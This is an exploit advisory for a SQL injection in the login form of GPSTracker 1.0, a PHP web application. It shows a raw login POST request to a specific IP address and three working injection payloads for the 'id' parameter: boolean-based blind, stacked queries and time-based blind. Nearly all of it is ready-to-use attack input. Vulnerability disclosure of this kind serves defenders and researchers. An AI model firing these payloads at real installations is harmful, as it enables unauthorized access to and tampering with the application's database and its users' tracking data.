GPSTracker 1.0 SQL Injection

`# Exploit Title: GPSTracker v1.0 - Login Page SQL Injection  
# Dork: N/A  
# Date: 23.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor Homepage: https://www.wecodex.com  
# https://codecanyon.net/item/gpstracker-gps-trackgin-system/21873663  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali linux  
# Description : PHP Dashboards is prone to an SQL-injection vulnerability  
because it fails to sufficiently sanitize user-supplied data before using  
it in an SQL query.Exploiting this issue could allow an attacker to  
compromise the application, access or modify data, or exploit latent  
vulnerabilities in the underlying database.  
  
====================================================  
  
# PoC : SQLi :  
  
  
http://test.com/fotracking/account/signin  
  
POST /fotracking/account/signin HTTP/1.1  
Host: 188.165.129.80  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Firefox/45.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://test.com/fotracking/login  
Content-Length: 32  
Cookie: PHPSESSID=ikk8m7o6v54836u6a36sr6qko1  
Connection: keep-alive  
id=democlient&password=test12345  
  
  
Vulnerable Payload :  
  
Parameter: id (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=democlient' AND 8345=8345 AND  
'jDLh'='jDLh&password=test12345  
  
Type: stacked queries  
Title: MySQL > 5.0.11 stacked queries (comment)  
Payload: id=democlient';SELECT SLEEP(5)#&password=test12345  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: id=democlient' AND SLEEP(5) AND 'yGiF'='yGiF&password=test12345  
  
  
====================================================  
  
`